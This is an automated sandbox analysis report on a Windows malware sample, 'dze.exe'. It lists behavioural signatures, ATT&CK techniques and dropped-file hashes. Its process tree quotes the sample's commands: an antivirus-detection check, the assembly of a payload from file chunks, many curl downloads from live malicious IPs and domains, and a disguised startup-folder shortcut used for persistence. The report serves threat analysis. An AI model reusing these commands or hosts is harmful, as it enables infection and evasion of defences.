ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197

Resubmissions

13-11-2024 08:24

241113-kaxexs1pfm 10

12-11-2024 13:12

241112-qfr1aatclg 10

Analysis

max time kernel
149s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13-11-2024 08:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dze.exe
Size

1.0MB
MD5

fc877cda1618318751789044fb01a6bd
SHA1

15f90c8f5c543964a33d62d6e68f62a6d2712262
SHA256

ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197
SHA512

b96c3148e98b089ce25b1a2987df24f87bd0e7cd312ee9dc270ce3d6dacc48276213f313c162dc721440410c2ca1a265fd54eea546095a2cafbe2a34cac912d4
SSDEEP

24576:ruPaNmFtZU7DPNqRLhVVOgHD/raiDhFDsoUCcjL:NQzUvPNakGbD/soUdjL

Score

10^/10

discovery

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Crossword.pif

description	pid	Process	procid_target
PID 1616 created 1204	1616	Crossword.pif	21

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url	cmd.exe

Executes dropped EXE 1 IoCs

Processes:

Crossword.pif

pid	Process
1616	Crossword.pif

Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid	Process
2912	cmd.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exe

pid	Process
2732	tasklist.exe
2404	tasklist.exe

Drops file in Windows directory 3 IoCs

Processes:

dze.exe

description	ioc	Process
File opened for modification	C:\Windows\SoilOasis	dze.exe
File opened for modification	C:\Windows\RebatesPalm	dze.exe
File opened for modification	C:\Windows\DouglasWind	dze.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

findstr.exefindstr.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exetasklist.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeWMIC.execmd.exedze.execmd.exefindstr.execmd.exechoice.execmd.execmd.execmd.execmd.execmd.exetasklist.execmd.execmd.execmd.execmd.execmd.exeCrossword.pifcmd.execmd.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dze.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crossword.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Crossword.pif

pid	Process
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

tasklist.exetasklist.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	2732	tasklist.exe
Token: SeDebugPrivilege	2404	tasklist.exe
Token: SeIncreaseQuotaPrivilege	908	WMIC.exe
Token: SeSecurityPrivilege	908	WMIC.exe
Token: SeTakeOwnershipPrivilege	908	WMIC.exe
Token: SeLoadDriverPrivilege	908	WMIC.exe
Token: SeSystemProfilePrivilege	908	WMIC.exe
Token: SeSystemtimePrivilege	908	WMIC.exe
Token: SeProfSingleProcessPrivilege	908	WMIC.exe
Token: SeIncBasePriorityPrivilege	908	WMIC.exe
Token: SeCreatePagefilePrivilege	908	WMIC.exe
Token: SeBackupPrivilege	908	WMIC.exe
Token: SeRestorePrivilege	908	WMIC.exe
Token: SeShutdownPrivilege	908	WMIC.exe
Token: SeDebugPrivilege	908	WMIC.exe
Token: SeSystemEnvironmentPrivilege	908	WMIC.exe
Token: SeRemoteShutdownPrivilege	908	WMIC.exe
Token: SeUndockPrivilege	908	WMIC.exe
Token: SeManageVolumePrivilege	908	WMIC.exe
Token: 33	908	WMIC.exe
Token: 34	908	WMIC.exe
Token: 35	908	WMIC.exe
Token: SeIncreaseQuotaPrivilege	908	WMIC.exe
Token: SeSecurityPrivilege	908	WMIC.exe
Token: SeTakeOwnershipPrivilege	908	WMIC.exe
Token: SeLoadDriverPrivilege	908	WMIC.exe
Token: SeSystemProfilePrivilege	908	WMIC.exe
Token: SeSystemtimePrivilege	908	WMIC.exe
Token: SeProfSingleProcessPrivilege	908	WMIC.exe
Token: SeIncBasePriorityPrivilege	908	WMIC.exe
Token: SeCreatePagefilePrivilege	908	WMIC.exe
Token: SeBackupPrivilege	908	WMIC.exe
Token: SeRestorePrivilege	908	WMIC.exe
Token: SeShutdownPrivilege	908	WMIC.exe
Token: SeDebugPrivilege	908	WMIC.exe
Token: SeSystemEnvironmentPrivilege	908	WMIC.exe
Token: SeRemoteShutdownPrivilege	908	WMIC.exe
Token: SeUndockPrivilege	908	WMIC.exe
Token: SeManageVolumePrivilege	908	WMIC.exe
Token: 33	908	WMIC.exe
Token: 34	908	WMIC.exe
Token: 35	908	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Crossword.pif

pid	Process
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Crossword.pif

pid	Process
1616	Crossword.pif
1616	Crossword.pif
1616	Crossword.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dze.execmd.exeCrossword.pifcmd.exe

description	pid	Process	procid_target
PID 1400 wrote to memory of 2912	1400	dze.exe	31
PID 1400 wrote to memory of 2912	1400	dze.exe	31
PID 1400 wrote to memory of 2912	1400	dze.exe	31
PID 1400 wrote to memory of 2912	1400	dze.exe	31
PID 2912 wrote to memory of 2732	2912	cmd.exe	33
PID 2912 wrote to memory of 2732	2912	cmd.exe	33
PID 2912 wrote to memory of 2732	2912	cmd.exe	33
PID 2912 wrote to memory of 2732	2912	cmd.exe	33
PID 2912 wrote to memory of 2852	2912	cmd.exe	34
PID 2912 wrote to memory of 2852	2912	cmd.exe	34
PID 2912 wrote to memory of 2852	2912	cmd.exe	34
PID 2912 wrote to memory of 2852	2912	cmd.exe	34
PID 2912 wrote to memory of 2404	2912	cmd.exe	36
PID 2912 wrote to memory of 2404	2912	cmd.exe	36
PID 2912 wrote to memory of 2404	2912	cmd.exe	36
PID 2912 wrote to memory of 2404	2912	cmd.exe	36
PID 2912 wrote to memory of 2364	2912	cmd.exe	37
PID 2912 wrote to memory of 2364	2912	cmd.exe	37
PID 2912 wrote to memory of 2364	2912	cmd.exe	37
PID 2912 wrote to memory of 2364	2912	cmd.exe	37
PID 2912 wrote to memory of 2144	2912	cmd.exe	38
PID 2912 wrote to memory of 2144	2912	cmd.exe	38
PID 2912 wrote to memory of 2144	2912	cmd.exe	38
PID 2912 wrote to memory of 2144	2912	cmd.exe	38
PID 2912 wrote to memory of 2240	2912	cmd.exe	39
PID 2912 wrote to memory of 2240	2912	cmd.exe	39
PID 2912 wrote to memory of 2240	2912	cmd.exe	39
PID 2912 wrote to memory of 2240	2912	cmd.exe	39
PID 2912 wrote to memory of 1316	2912	cmd.exe	40
PID 2912 wrote to memory of 1316	2912	cmd.exe	40
PID 2912 wrote to memory of 1316	2912	cmd.exe	40
PID 2912 wrote to memory of 1316	2912	cmd.exe	40
PID 2912 wrote to memory of 1616	2912	cmd.exe	41
PID 2912 wrote to memory of 1616	2912	cmd.exe	41
PID 2912 wrote to memory of 1616	2912	cmd.exe	41
PID 2912 wrote to memory of 1616	2912	cmd.exe	41
PID 2912 wrote to memory of 1732	2912	cmd.exe	42
PID 2912 wrote to memory of 1732	2912	cmd.exe	42
PID 2912 wrote to memory of 1732	2912	cmd.exe	42
PID 2912 wrote to memory of 1732	2912	cmd.exe	42
PID 1616 wrote to memory of 2448	1616	Crossword.pif	43
PID 1616 wrote to memory of 2448	1616	Crossword.pif	43
PID 1616 wrote to memory of 2448	1616	Crossword.pif	43
PID 1616 wrote to memory of 2448	1616	Crossword.pif	43
PID 1616 wrote to memory of 1948	1616	Crossword.pif	45
PID 1616 wrote to memory of 1948	1616	Crossword.pif	45
PID 1616 wrote to memory of 1948	1616	Crossword.pif	45
PID 1616 wrote to memory of 1948	1616	Crossword.pif	45
PID 1948 wrote to memory of 908	1948	cmd.exe	47
PID 1948 wrote to memory of 908	1948	cmd.exe	47
PID 1948 wrote to memory of 908	1948	cmd.exe	47
PID 1948 wrote to memory of 908	1948	cmd.exe	47
PID 1616 wrote to memory of 1268	1616	Crossword.pif	48
PID 1616 wrote to memory of 1268	1616	Crossword.pif	48
PID 1616 wrote to memory of 1268	1616	Crossword.pif	48
PID 1616 wrote to memory of 1268	1616	Crossword.pif	48
PID 1616 wrote to memory of 2652	1616	Crossword.pif	50
PID 1616 wrote to memory of 2652	1616	Crossword.pif	50
PID 1616 wrote to memory of 2652	1616	Crossword.pif	50
PID 1616 wrote to memory of 2652	1616	Crossword.pif	50
PID 1616 wrote to memory of 2704	1616	Crossword.pif	52
PID 1616 wrote to memory of 2704	1616	Crossword.pif	52
PID 1616 wrote to memory of 2704	1616	Crossword.pif	52
PID 1616 wrote to memory of 2704	1616	Crossword.pif	52

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\dze.exe
  "C:\Users\Admin\AppData\Local\Temp\dze.exe"
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1400
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2912
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2732
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa opssvc"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2852
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2404
  - - C:\Windows\SysWOW64\findstr.exe
      findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2364
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 226443
      4⤵
      System Location Discovery: System Language Discovery
      PID:2144
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "AthleticsTabletsUserImaging" Slovenia
      4⤵
      System Location Discovery: System Language Discovery
      PID:2240
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d
      4⤵
      System Location Discovery: System Language Discovery
      PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
      Crossword.pif d
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1616
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\438 2>&1
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1948
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\438 > C:\Users\Admin\AppData\Local\temp\725
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1268
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\romjw" "178.215.224.252/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2652
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qjomo" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2704
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bjkjv" "178.215.224.161/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2664
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qcgnu" "178.215.224.251/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2860
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\shquc" "178.215.224.65/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fllfp" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2620
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pjksp" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2988
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bobse" "178.215.224.252/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fociu" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1072
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eldsb" "178.215.224.161/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:328
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hwdec" "178.215.224.251/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1404
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ydmnl" "178.215.224.65/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2276
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\medzi" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:316
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ejtsx" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ttjyz" "178.215.224.252/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2908
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lwlgh" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2920
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bapjk" "178.215.224.161/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2396
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zyxlv" "178.215.224.251/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2788
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cjnpc" "178.215.224.65/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2120
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sltaw" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:964
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\svmko" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:968
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jmaha" "178.215.224.252/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2332
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\loaob" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gwawi" "178.215.224.161/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:620
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kyvff" "178.215.224.251/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1036
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bmetz" "178.215.224.65/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1456
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      System Location Discovery: System Language Discovery
      PID:1732
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:2448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\226443\d

Filesize
546KB

MD5
7e6971c69a6ca7279da0e89b4b388189

SHA1
894fdd50dead4f46ac677ad06d1455943167ae1f

SHA256
1ae9c8851afa317293db0435ea27ad3fa8fda82a08209ee536ec947130e5c98c

SHA512
06296a0878df852fdd54fb31366d09c5c1984e1f6eaea22f1895d40a78d0ff07cf7a90bf1725becc630dbb33906d0764d6f314653c8f965ffdd91310c9699c0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Column

Filesize
75KB

MD5
d05e382bb4f1e9bb4bce6108e318ea6b

SHA1
ae0344388bc8d4e10a93c305c1f80bc60ab7bd7a

SHA256
ccd218caebb98be70e2caf40b17d54510571e48efa475cdce3c2f71581232a51

SHA512
742980e178aa801829c623ab9ff4d494d8555e2ef26542abdaf46b47fcf521ccf8dd7bf248ff98f1104a8fb18606c84bb4ca198df3ee28b96525bccae7a06d80

Download Submit
C:\Users\Admin\AppData\Local\Temp\Environment

Filesize
64KB

MD5
b6024d20dba6454f8e2df9086438fce7

SHA1
3edb339cc5960a05ab3d1ab615d4152b092ee832

SHA256
a87a9f1aee8317c1f3fd9c69ee65a569944618092cc1f6fbeb467ab2aa73cecf

SHA512
651e002fa45b48d51803fdd13ff379bf29937438df3a4001c7f935643ca1de4b5a2e4a4a376adf1b3c35b00ac1ed0856916b9d048a88a07a4d8bb989c4a62c56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Events

Filesize
95KB

MD5
67498253ff01bc79ab26bdaa2183b367

SHA1
5c6efd758ab0b450c8a9ecaeb108e9272535a3b3

SHA256
60c91ae2bed2f72dda2ff6cb4deb1367a437df370be43bea1b7fdb58fd43fae8

SHA512
75fd5cf671a177d0c0ff18e2d088b1b6de0ef839cfd5ea410c4cfba65f26e2253983fb0ad7904cd4ba3f012b035a4682cc95ffbc35d96ad84c09ed2fc3cc19e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Explanation

Filesize
14KB

MD5
773bc1cb8deb9ff09bc892af84ae5681

SHA1
09f815af8eca0c373302204f58b47f591a300b7c

SHA256
f97765bb2d46f5755af315c71afeb50f52f282caee0a19b9f2644946a9308d42

SHA512
e05b77521bf5c51b60a0d7e9cdc8df2c06e3a065dc3afd42d34444484941b934e36e1ce4f80fb7a86d7c1bb8935abed9070672a02a4a3c12e22a17907b0c9223

Download Submit
C:\Users\Admin\AppData\Local\Temp\Heather

Filesize
52KB

MD5
5ebe13d4704e614c4e597bed036a2591

SHA1
b6a40f939e04c997482307fb14126e716efafb2b

SHA256
3b65ae5300550700ece120dade16b6a47ceda16b437853eda1d5c4358d990712

SHA512
ee436b9624eb7eed3c4ae94637a9f13e53cd8da340aad4850cd9c8b8a7d98545623579cb34829ffe04904274033ae7f90f2d18f9dc1ecf260294c76cce943c36

Download Submit
C:\Users\Admin\AppData\Local\Temp\Index

Filesize
902KB

MD5
358194c0c510ff11f8f3d68afe5ea595

SHA1
e801c32a9b1414741a6fb2aec201d979ec927bbf

SHA256
cfb087fd56dd576f4f4db3b0930adf021950b20b65fe4c1527cb9a090e00565b

SHA512
8805cc8cb6eeb466afe5f5bea5baf3eeda3cf6f422cc761239c31656624472637d5d3a5ecfec45f134f620c34a674e8edd8b88ff36647ea4628bfcc7988fac86

Download Submit
C:\Users\Admin\AppData\Local\Temp\Law

Filesize
72KB

MD5
a57501ae52b7c24db316a678306f8083

SHA1
3cf2b2942943163781db70f6759153214fcd1c37

SHA256
8ea7d0e706039bd23733e77b84199102bcd4df8ece1e0c63daf55ed29749683c

SHA512
306de902e6f18b1acceb3bbac47b619bcd0f148a04fd634d13c0a9fdf57ec56edd688ffdd56ec6c827897209c3ffeeb362b2acfe9e1f2df348d7982e4c5626fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Merit

Filesize
82KB

MD5
f8fef0dc6066b6bdae93db3c69368170

SHA1
e4d55d4c83b049968d5a6f4eee6ad9efe86dff79

